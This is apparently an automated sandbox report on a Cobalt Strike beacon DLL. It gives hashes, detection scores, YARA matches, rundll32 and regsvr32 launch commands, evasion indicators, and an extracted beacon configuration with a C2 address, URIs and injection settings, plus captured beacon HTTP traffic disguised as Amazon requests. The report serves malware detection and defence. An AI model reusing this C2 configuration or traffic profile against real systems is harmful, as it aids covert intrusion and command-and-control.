Windows Analysis Report
8082-x64.dll.dll

Overview

General Information

Sample Name: 8082-x64.dll.dll
Analysis ID: 780203
MD5: 43616639411a590f022505998a6f567e
SHA1: 416932059dc3488000b171beeac258fc792d4c71
SHA256: 6a289f491c8d5d789e31e89c73ba06ef6fc075458a1106b7213b29da798f6c03
Tags: 45139105143exeopendir
Infos:

Detection

CobaltStrike
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected CobaltStrike
C2 URLs / IPs found in malware configuration
Uses known network protocols on non-standard ports
Machine Learning detection for sample
Yara signature match
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected TCP or UDP traffic on non-standard ports
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Registers a DLL
Sample execution stops while process was sleeping (likely an evasion)
PE file contains more sections than normal
Program does not show much activity (idle)
Creates a process in suspended mode (likely to inject code)
IP address seen in connection with other malware

Classification

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: 8082-x64.dll.dll Avira: detected
Multi AV Scanner detection for submitted file
Source: 8082-x64.dll.dll ReversingLabs: Detection: 78%
Source: 8082-x64.dll.dll Virustotal: Detection: 63% Perma Link
Machine Learning detection for sample
Source: 8082-x64.dll.dll Joe Sandbox ML: detected
Source: 00000000.00000003.323615011.0000026760590000.00000020.00001000.00020000.00000000.sdmp Malware Configuration Extractor: CobaltStrike {"BeaconType": ["HTTP"], "Port": 8082, "SleepTime": 38500, "MaxGetSize": 1399607, "Jitter": 27, "C2Server": "20.104.209.69,/broadcast", "HttpPostUri": "/1/events/com.amazon.csm.csa.prod", "Malleable_C2_Instructions": ["Remove 1308 bytes from the end", "Remove 1 bytes from the end", "Remove 194 bytes from the beginning", "Base64 decode"], "SpawnTo": "16nKFaB/gr/TtjAg2jiqFg==", "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%windir%\\syswow64\\gpupdate.exe", "Spawnto_x64": "%windir%\\sysnative\\gpupdate.exe", "CryptoScheme": 0, "Proxy_Behavior": "Use IE settings", "Watermark": 1670873463, "bStageCleanup": "True", "bCFGCaution": "True", "KillDate": 0, "bProcInject_StartRWX": "True", "bProcInject_UseRWX": "False", "bProcInject_MinAllocSize": 16700, "ProcInject_PrependAppend_x86": ["kJCQ", "Empty"], "ProcInject_PrependAppend_x64": ["kJCQ", "Empty"], "ProcInject_Execute": ["ntdll.dll:RtlUserThreadStart", "SetThreadContext", "NtQueueApcThread-s", "kernel32.dll:LoadLibraryA", "CreateRemoteThread", "RtlCreateUserThread"], "ProcInject_AllocationMethod": "NtMapViewOfSection", "bUsesCookies": "False", "HostHeader": ""}

Networking
barindex
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: 20.104.209.69
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 49699 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 8082 -> 49699
Source: unknown Network traffic detected: HTTP traffic on port 49700 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 8082 -> 49700
Source: unknown Network traffic detected: HTTP traffic on port 49701 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 8082 -> 49701
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 8082 -> 49707
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 8082 -> 49709
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /broadcast HTTP/1.1Accept: application/json, text/plain, */*Accept-Language: en-US,en;q=0.5Origin: https://www.amazon.comReferer: https://www.amazon.comSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: cross-siteTe: trailersx-amzn-RequestId: FHpLzZRFDaJcV3Y7qyufQOISTIObeVemP+NmdAYcRRIE3FV/EUpEubshH3rkXVtRwA0H5UqybBKz1PDmJULg1XGljnjPbkoWruec57yIzOL214VyxG9n4/paEbjVA0xB3WsFwgdNY86xsizSKv8fcjdoFgmVx/FrmUZeOA6bHh4=User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 20.104.209.69:8082Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /broadcast HTTP/1.1Accept: application/json, text/plain, */*Accept-Language: en-US,en;q=0.5Origin: https://www.amazon.comReferer: https://www.amazon.comSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: cross-siteTe: trailersx-amzn-RequestId: FHpLzZRFDaJcV3Y7qyufQOISTIObeVemP+NmdAYcRRIE3FV/EUpEubshH3rkXVtRwA0H5UqybBKz1PDmJULg1XGljnjPbkoWruec57yIzOL214VyxG9n4/paEbjVA0xB3WsFwgdNY86xsizSKv8fcjdoFgmVx/FrmUZeOA6bHh4=User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 20.104.209.69:8082Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /1/events/com.amazon.csm.csa.prod HTTP/1.1Accept: */*Origin: https://www.amazon.comx-amz-rid: MzM0ODIwMjEyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 20.104.209.69:8082Content-Length: 14587Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /broadcast HTTP/1.1Accept: application/json, text/plain, */*Accept-Language: en-US,en;q=0.5Origin: https://www.amazon.comReferer: https://www.amazon.comSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: cross-siteTe: trailersx-amzn-RequestId: FHpLzZRFDaJcV3Y7qyufQOISTIObeVemP+NmdAYcRRIE3FV/EUpEubshH3rkXVtRwA0H5UqybBKz1PDmJULg1XGljnjPbkoWruec57yIzOL214VyxG9n4/paEbjVA0xB3WsFwgdNY86xsizSKv8fcjdoFgmVx/FrmUZeOA6bHh4=User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 20.104.209.69:8082Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /broadcast HTTP/1.1Accept: application/json, text/plain, */*Accept-Language: en-US,en;q=0.5Origin: https://www.amazon.comReferer: https://www.amazon.comSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: cross-siteTe: trailersx-amzn-RequestId: FHpLzZRFDaJcV3Y7qyufQOISTIObeVemP+NmdAYcRRIE3FV/EUpEubshH3rkXVtRwA0H5UqybBKz1PDmJULg1XGljnjPbkoWruec57yIzOL214VyxG9n4/paEbjVA0xB3WsFwgdNY86xsizSKv8fcjdoFgmVx/FrmUZeOA6bHh4=User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 20.104.209.69:8082Connection: Keep-AliveCache-Control: no-cache
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.5:49699 -> 20.104.209.69:8082
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: MICROSOFT-CORP-MSN-AS-BLOCKUS MICROSOFT-CORP-MSN-AS-BLOCKUS
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 20.104.209.69 20.104.209.69
Source: unknown TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: unknown TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: loaddll64.exe, 00000000.00000002.579185009.0000026760353000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://20.104.209.69:8082/1/events/com.amazon.csm.csa.prod
Source: loaddll64.exe, 00000000.00000002.579245580.00000267603A5000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://20.104.209.69:8082/broadcast
Source: loaddll64.exe, 00000000.00000003.395924452.00000267603A7000.00000004.00001000.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000002.579245580.00000267603A5000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://20.104.209.69:8082/broadcast((
Source: loaddll64.exe, 00000000.00000003.395924452.00000267603A7000.00000004.00001000.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000002.579245580.00000267603A5000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://20.104.209.69:8082/broadcast2
Source: loaddll64.exe, 00000000.00000003.395924452.00000267603A7000.00000004.00001000.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000002.579245580.00000267603A5000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://20.104.209.69:8082/broadcast?
Source: loaddll64.exe, 00000000.00000002.579185009.0000026760353000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://20.104.209.69:8082/broadcastp
Source: loaddll64.exe, 00000000.00000002.579668975.0000026760402000.00000004.00000001.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000002.579895773.00000267605C1000.00000004.00001000.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000002.579889103.0000026760597000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://d22u79neyj432a.cloudfront.net/bfc50dfa-8e10-44b5-ae59-ac26bfc71489/54857e6d-c060-4b3c-914a-8
Source: loaddll64.exe, 00000000.00000002.579185009.0000026760353000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com
Source: unknown HTTP traffic detected: POST /1/events/com.amazon.csm.csa.prod HTTP/1.1Accept: */*Origin: https://www.amazon.comx-amz-rid: MzM0ODIwMjEyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 20.104.209.69:8082Content-Length: 14587Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /broadcast HTTP/1.1Accept: application/json, text/plain, */*Accept-Language: en-US,en;q=0.5Origin: https://www.amazon.comReferer: https://www.amazon.comSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: cross-siteTe: trailersx-amzn-RequestId: FHpLzZRFDaJcV3Y7qyufQOISTIObeVemP+NmdAYcRRIE3FV/EUpEubshH3rkXVtRwA0H5UqybBKz1PDmJULg1XGljnjPbkoWruec57yIzOL214VyxG9n4/paEbjVA0xB3WsFwgdNY86xsizSKv8fcjdoFgmVx/FrmUZeOA6bHh4=User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 20.104.209.69:8082Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /broadcast HTTP/1.1Accept: application/json, text/plain, */*Accept-Language: en-US,en;q=0.5Origin: https://www.amazon.comReferer: https://www.amazon.comSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: cross-siteTe: trailersx-amzn-RequestId: FHpLzZRFDaJcV3Y7qyufQOISTIObeVemP+NmdAYcRRIE3FV/EUpEubshH3rkXVtRwA0H5UqybBKz1PDmJULg1XGljnjPbkoWruec57yIzOL214VyxG9n4/paEbjVA0xB3WsFwgdNY86xsizSKv8fcjdoFgmVx/FrmUZeOA6bHh4=User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 20.104.209.69:8082Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /broadcast HTTP/1.1Accept: application/json, text/plain, */*Accept-Language: en-US,en;q=0.5Origin: https://www.amazon.comReferer: https://www.amazon.comSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: cross-siteTe: trailersx-amzn-RequestId: FHpLzZRFDaJcV3Y7qyufQOISTIObeVemP+NmdAYcRRIE3FV/EUpEubshH3rkXVtRwA0H5UqybBKz1PDmJULg1XGljnjPbkoWruec57yIzOL214VyxG9n4/paEbjVA0xB3WsFwgdNY86xsizSKv8fcjdoFgmVx/FrmUZeOA6bHh4=User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 20.104.209.69:8082Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /broadcast HTTP/1.1Accept: application/json, text/plain, */*Accept-Language: en-US,en;q=0.5Origin: https://www.amazon.comReferer: https://www.amazon.comSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: cross-siteTe: trailersx-amzn-RequestId: FHpLzZRFDaJcV3Y7qyufQOISTIObeVemP+NmdAYcRRIE3FV/EUpEubshH3rkXVtRwA0H5UqybBKz1PDmJULg1XGljnjPbkoWruec57yIzOL214VyxG9n4/paEbjVA0xB3WsFwgdNY86xsizSKv8fcjdoFgmVx/FrmUZeOA6bHh4=User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 20.104.209.69:8082Connection: Keep-AliveCache-Control: no-cache

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 00000000.00000003.323615011.0000026760590000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Rule for beacon reflective loader Author: unknown
Yara signature match
Source: 8082-x64.dll.dll, type: SAMPLE Matched rule: CobaltStrike_Resources_Artifact64_v3_14_to_v4_x date = 2022-11-18, author = gssincla@google.com, description = Cobalt Strike\'s resources/artifact64{.exe,.dll,svc.exe,svcbig.exe,big.exe,big.dll,.x64.dll,big.x64.dll} and resource/artifactuac(alt)64.exe signature for versions v3.14 through v4.x, reference = https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse, hash = decfcca0018f2cec4a200ea057c804bb357300a67c6393b097d52881527b1c44
Source: 00000000.00000002.579279943.00000267603C6000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_PS1_FromBase64String_Content_Indicator date = 2020-01-25, author = Florian Roth, description = Detects suspicious base64 encoded PowerShell expressions, type = file, reference = https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639
Source: 00000000.00000002.579279943.00000267603C6000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: CobaltStrike_Resources_Command_Ps1_v2_5_to_v3_7_and_Resources_Compress_Ps1_v3_8_to_v4_x date = 2022-11-18, author = gssincla@google.com, description = Cobalt Strike\'s resources/command.ps1 for versions 2.5 to v3.7 and resources/compress.ps1 from v3.8 to v4.x, reference = https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse, hash = 932dec24b3863584b43caf9bb5d0cfbd7ed1969767d3061a7abdc05d3239ed62
Source: 00000000.00000003.323615011.0000026760590000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: CobaltStrike_Sleeve_BeaconLoader_VA_x64_o_v4_3_v4_4_v4_5_and_v4_6 date = 2022-11-18, author = gssincla@google.com, description = Cobalt Strike\'s sleeve/BeaconLoader.VA.x64.o (VirtualAlloc) Versions 4.3 through at least 4.6, reference = https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse, hash = ac090a0707aa5ccd2c645b523bd23a25999990cf6895fce3bfa3b025e3e8a1c9
Source: 00000000.00000003.323615011.0000026760590000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Cobaltbaltstrike_Beacon_x64 author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000000.00000003.323615011.0000026760590000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: CobaltStrike_C2_Encoded_XOR_Config_Indicator date = 2021-07-08, author = yara@s3c.za.net, description = Detects CobaltStrike C2 encoded profile configuration
Source: 00000000.00000003.323615011.0000026760590000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: CobaltStrike_MZ_Launcher date = 2021-07-08, author = yara@s3c.za.net, description = Detects CobaltStrike MZ header ReflectiveLoader launcher
Source: 00000000.00000003.323615011.0000026760590000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: 00000000.00000003.323615011.0000026760590000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: Process Memory Space: loaddll64.exe PID: 3648, type: MEMORYSTR Matched rule: SUSP_PS1_FromBase64String_Content_Indicator date = 2020-01-25, author = Florian Roth, description = Detects suspicious base64 encoded PowerShell expressions, type = file, reference = https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639
Source: Process Memory Space: loaddll64.exe PID: 3648, type: MEMORYSTR Matched rule: CobaltStrike_Resources_Command_Ps1_v2_5_to_v3_7_and_Resources_Compress_Ps1_v3_8_to_v4_x date = 2022-11-18, author = gssincla@google.com, description = Cobalt Strike\'s resources/command.ps1 for versions 2.5 to v3.7 and resources/compress.ps1 from v3.8 to v4.x, reference = https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse, hash = 932dec24b3863584b43caf9bb5d0cfbd7ed1969767d3061a7abdc05d3239ed62
Source: Process Memory Space: loaddll64.exe PID: 3648, type: MEMORYSTR Matched rule: CobaltStrike_C2_Encoded_XOR_Config_Indicator date = 2021-07-08, author = yara@s3c.za.net, description = Detects CobaltStrike C2 encoded profile configuration
Tries to load missing DLLs
Source: C:\Windows\System32\regsvr32.exe Section loaded: sfc.dll Jump to behavior
PE file contains more sections than normal
Source: 8082-x64.dll.dll Static PE information: Number of sections : 11 > 10
Source: 8082-x64.dll.dll ReversingLabs: Detection: 78%
Source: 8082-x64.dll.dll Virustotal: Detection: 63%
Source: 8082-x64.dll.dll Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\loaddll64.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\8082-x64.dll.dll",#1
Source: unknown Process created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\8082-x64.dll.dll"
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\8082-x64.dll.dll",#1
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\8082-x64.dll.dll
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\8082-x64.dll.dll",#1
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\8082-x64.dll.dll,DllGetClassObject
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\8082-x64.dll.dll,DllMain
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\8082-x64.dll.dll,DllRegisterServer
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\8082-x64.dll.dll",#1 Jump to behavior
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\8082-x64.dll.dll Jump to behavior
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\8082-x64.dll.dll,DllGetClassObject Jump to behavior
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\8082-x64.dll.dll,DllMain Jump to behavior
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\8082-x64.dll.dll,DllRegisterServer Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\8082-x64.dll.dll",#1 Jump to behavior
Source: C:\Windows\System32\loaddll64.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2884:120:WilError_01
Source: classification engine Classification label: mal100.troj.winDLL@14/0@0/1
Source: 8082-x64.dll.dll Static PE information: Image base 0x6bac0000 > 0x60000000
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\loaddll64.exe Code function: 0_3_0000026760595E1A push ecx; ret 0_3_0000026760595E2D
Source: C:\Windows\System32\loaddll64.exe Code function: 0_3_0000026760596786 push ebx; ret 0_3_0000026760596794
Source: C:\Windows\System32\loaddll64.exe Code function: 0_3_0000026760596726 push ebx; ret 0_3_0000026760596794
Source: C:\Windows\System32\loaddll64.exe Code function: 0_3_0000026760595795 push eax; ret 0_3_00000267605957A4
Source: C:\Windows\System32\loaddll64.exe Code function: 0_3_00000267605957C3 push eax; ret 0_3_00000267605957A4
Source: C:\Windows\System32\loaddll64.exe Code function: 0_3_00000267605978FA push ecx; ret 0_3_0000026760597918
Source: C:\Windows\System32\loaddll64.exe Code function: 0_3_0000026760594167 push esi; ret 0_3_000002676059416C
Source: C:\Windows\System32\loaddll64.exe Code function: 0_3_000002676059625F push ebp; ret 0_3_0000026760596263
Source: C:\Windows\System32\loaddll64.exe Code function: 0_3_00000267605972C8 push ebx; ret 0_3_00000267605972E8
Source: C:\Windows\System32\loaddll64.exe Code function: 0_3_0000026760594AC9 push esp; ret 0_3_0000026760594AD2
Source: C:\Windows\System32\loaddll64.exe Code function: 0_3_0000026760595AEF push edx; ret 0_3_0000026760595AB8
Source: C:\Windows\System32\loaddll64.exe Code function: 0_3_00000267605972EB push esp; ret 0_3_000002676059731C
Source: C:\Windows\System32\loaddll64.exe Code function: 0_3_0000026760594C00 push esi; ret 0_3_0000026760594C09
Source: C:\Windows\System32\loaddll64.exe Code function: 0_3_0000026760594480 push edx; ret 0_3_0000026760594498
Source: C:\Windows\System32\loaddll64.exe Code function: 0_3_0000026760598469 push es; ret 0_3_0000026760598470
Source: C:\Windows\System32\loaddll64.exe Code function: 0_3_0000026760598498 push ebp; ret 0_3_000002676059849F
PE file contains sections with non-standard names
Source: 8082-x64.dll.dll Static PE information: section name: .xdata
Registers a DLL
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\8082-x64.dll.dll

Hooking and other Techniques for Hiding and Protection
barindex
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 49699 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 8082 -> 49699
Source: unknown Network traffic detected: HTTP traffic on port 49700 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 8082 -> 49700
Source: unknown Network traffic detected: HTTP traffic on port 49701 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 8082 -> 49701
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 8082 -> 49707
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 8082 -> 49709
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\loaddll64.exe TID: 3724 Thread sleep time: -120000s >= -30000s Jump to behavior
Source: C:\Windows\System32\loaddll64.exe TID: 5220 Thread sleep time: -32461s >= -30000s Jump to behavior
Source: C:\Windows\System32\loaddll64.exe TID: 5220 Thread sleep time: -37737s >= -30000s Jump to behavior
Source: C:\Windows\System32\loaddll64.exe TID: 5220 Thread sleep time: -34501s >= -30000s Jump to behavior
